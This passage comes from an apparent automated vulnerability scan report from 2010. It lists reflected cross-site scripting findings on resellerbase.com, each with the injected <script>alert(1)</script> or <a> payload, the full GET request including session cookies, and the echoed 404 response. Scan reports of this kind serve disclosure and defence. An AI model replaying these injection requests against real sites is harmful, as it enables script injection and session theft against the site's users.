Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/ed2e8<script>alert(1)</script>fe69a678196 was not found on this server.</p>
...[SNIP]...

2.1560. http://www.resellerbase.com/detail/19/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 89281<script>alert(1)</script>dccfa4d212b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail89281<script>alert(1)</script>dccfa4d212b/19/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail89281<script>alert(1)</script>dccfa4d212b/19/ was not found on this server.</p>
...[SNIP]...

2.1561. http://www.resellerbase.com/detail/19/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 48348<script>alert(1)</script>ba4d13a228b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1948348<script>alert(1)</script>ba4d13a228b/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1948348<script>alert(1)</script>ba4d13a228b/ was not found on this server.</p>
...[SNIP]...

2.1562. http://www.resellerbase.com/detail/19/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a9e99<script>alert(1)</script>c50740cada7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/?a9e99<script>alert(1)</script>c50740cada7=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/?a9e99<script>alert(1)</script>c50740cada7=1 was not found on this server.</p>
...[SNIP]...

2.1563. http://www.resellerbase.com/detail/19/dating-central-com.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/dating-central-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fb60d<script>alert(1)</script>ae834bb1b76 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailfb60d<script>alert(1)</script>ae834bb1b76/19/dating-central-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailfb60d<script>alert(1)</script>ae834bb1b76/19/dating-central-com.html was not found on this server.</p>
...[SNIP]...

2.1564. http://www.resellerbase.com/detail/19/dating-central-com.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/19/dating-central-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8b525<a>b5e824b5021 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/198b525<a>b5e824b5021/dating-central-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/hot.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/198b525<a>b5e824b5021/dating-central-com.html was not found on this server.</p>
...[SNIP]...

2.1565. http://www.resellerbase.com/detail/19/dating-central-com.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/dating-central-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 912cc<script>alert(1)</script>17b03b030fa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/912cc<script>alert(1)</script>17b03b030fa HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/912cc<script>alert(1)</script>17b03b030fa was not found on this server.</p>
...[SNIP]...

2.1566. http://www.resellerbase.com/detail/19/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3b39f<script>alert(1)</script>d8457e730b2cb1267 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail3b39f<script>alert(1)</script>d8457e730b2cb1267/19/rating.php?id=19&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/dating-central-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail3b39f<script>alert(1)</script>d8457e730b2cb1267/19/rating.php?id=19&rating=5 was not found on this server.</p>
...[SNIP]...

2.1567. http://www.resellerbase.com/detail/19/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5e7ef<script>alert(1)</script>86151132e22 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail5e7ef<script>alert(1)</script>86151132e22/19/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail5e7ef<script>alert(1)</script>86151132e22/19/rating.php was not found on this server.</p>
...[SNIP]...

2.1568. http://www.resellerbase.com/detail/19/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9ae51<script>alert(1)</script>beb0eb2d8c915b014 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/199ae51<script>alert(1)</script>beb0eb2d8c915b014/rating.php?id=19&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/dating-central-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/199ae51<script>alert(1)</script>beb0eb2d8c915b014/rating.php?id=19&rating=5 was not found on this server.</p>
...[SNIP]...

2.1569. http://www.resellerbase.com/detail/19/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6004c<script>alert(1)</script>57e9edf5313 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/196004c<script>alert(1)</script>57e9edf5313/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/196004c<script>alert(1)</script>57e9edf5313/rating.php was not found on this server.</p>
...[SNIP]...

2.1570. http://www.resellerbase.com/detail/19/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b0eec<script>alert(1)</script>254612363c4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/rating.phpb0eec<script>alert(1)</script>254612363c4 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/rating.phpb0eec<script>alert(1)</script>254612363c4 was not found on this server.</p>
...[SNIP]...

2.1571. http://www.resellerbase.com/detail/19/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 73988<script>alert(1)</script>7fbfdac7cb74e85c4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/19/rating.php73988<script>alert(1)</script>7fbfdac7cb74e85c4?id=19&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/dating-central-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/rating.php73988<script>alert(1)</script>7fbfdac7cb74e85c4?id=19&rating=5 was not found on this server.</p>
...[SNIP]...

2.1572. http://www.resellerbase.com/detail/19/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b10c2<script>alert(1)</script>26e5839c1b84060eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/19/rating.php/b10c2<script>alert(1)</script>26e5839c1b84060eb?id=19&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/dating-central-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/rating.php/b10c2<script>alert(1)</script>26e5839c1b84060eb?id=19&rating=5 was not found on this server.</p>
...[SNIP]...

2.1573. http://www.resellerbase.com/detail/19/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c594e<script>alert(1)</script>dc56e90bc9b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/rating.php?c594e<script>alert(1)</script>dc56e90bc9b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:34:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/rating.php?c594e<script>alert(1)</script>dc56e90bc9b=1 was not found on this server.</p>
...[SNIP]...

2.1574. http://www.resellerbase.com/detail/19/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 96037<script>alert(1)</script>b3a8b5225fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail96037<script>alert(1)</script>b3a8b5225fa/19/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/dating-central-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail96037<script>alert(1)</script>b3a8b5225fa/19/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1575. http://www.resellerbase.com/detail/19/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 66924<script>alert(1)</script>7ed0a01615b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1966924<script>alert(1)</script>7ed0a01615b/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/dating-central-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1966924<script>alert(1)</script>7ed0a01615b/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1576. http://www.resellerbase.com/detail/19/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b576c<script>alert(1)</script>431900b0fcb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/search.phpb576c<script>alert(1)</script>431900b0fcb?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/dating-central-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/search.phpb576c<script>alert(1)</script>431900b0fcb?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1577. http://www.resellerbase.com/detail/19/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/19/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 93def<a>b25b53ff137 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/19/search.php?keyword=search...&Submit3=Search93def<a>b25b53ff137&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/dating-central-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/search.php?keyword=search...&Submit3=Search93def<a>b25b53ff137&opt=2 was not found on this server.</p>
...[SNIP]...

2.1578. http://www.resellerbase.com/detail/19/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/19/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 6929b<a>d4f7ae0ff24 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/19/search.php?keyword=search...6929b<a>d4f7ae0ff24&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/dating-central-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/search.php?keyword=search...6929b<a>d4f7ae0ff24&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1579. http://www.resellerbase.com/detail/19/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/search.php

Issue detail

